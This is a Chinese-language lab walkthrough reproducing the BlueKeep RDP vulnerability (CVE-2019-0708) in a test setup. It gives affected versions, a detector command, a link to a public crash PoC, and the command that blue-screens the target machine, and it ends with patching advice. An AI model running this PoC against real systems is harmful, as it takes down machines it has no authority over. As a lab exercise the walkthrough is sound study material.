Windows RDP远程代码执行 CVE-2019-0708 漏洞复现
漏洞简介
Windows操作系统远程桌面服务远程代码执行漏洞(CVE-2019-0708) , 2019年5月14日微软官方发布安全补丁,修复了windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。
影响版本
Windows 7
Windows server 2008 R2
Windows server 2008
Windows 2003
Windows xp
Windows 8和windows10以及之后的版本不受此漏洞影响
漏洞环境
攻击机:Windows 10
靶机:Windows 7
两机处于同一网络
攻击机安装python 3
靶机开启远程连接服务,即开启3389端口,关闭防火墙或者在防火墙策略中放行3389端口
漏洞复现
靶机查看是否开启3389端口
netstat -an
攻击机检测靶机是否存在该漏洞
检测工具下载: https://free.360totalsecurity.com/CVE-2019-0708/detector_release.zip
使用方法:
0708Detector_v2_x64.exe -t 192.168.30.153 -p 3389
出现如上提示,则说明应该存在该漏洞
进行攻击
攻击POC下载: https://github.com/n1xbyte/CVE-2019-0708
使用 python 安装 impacket模块
py -3 -m pip install impacket
然后使用攻击的python脚本
py -3 crashpoc.py 192.168.30.153 64
靶机蓝屏,则攻击成功
漏洞修复
下载补丁:https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2019-0708
关闭3389远程桌面端口
开启防火墙
更新系统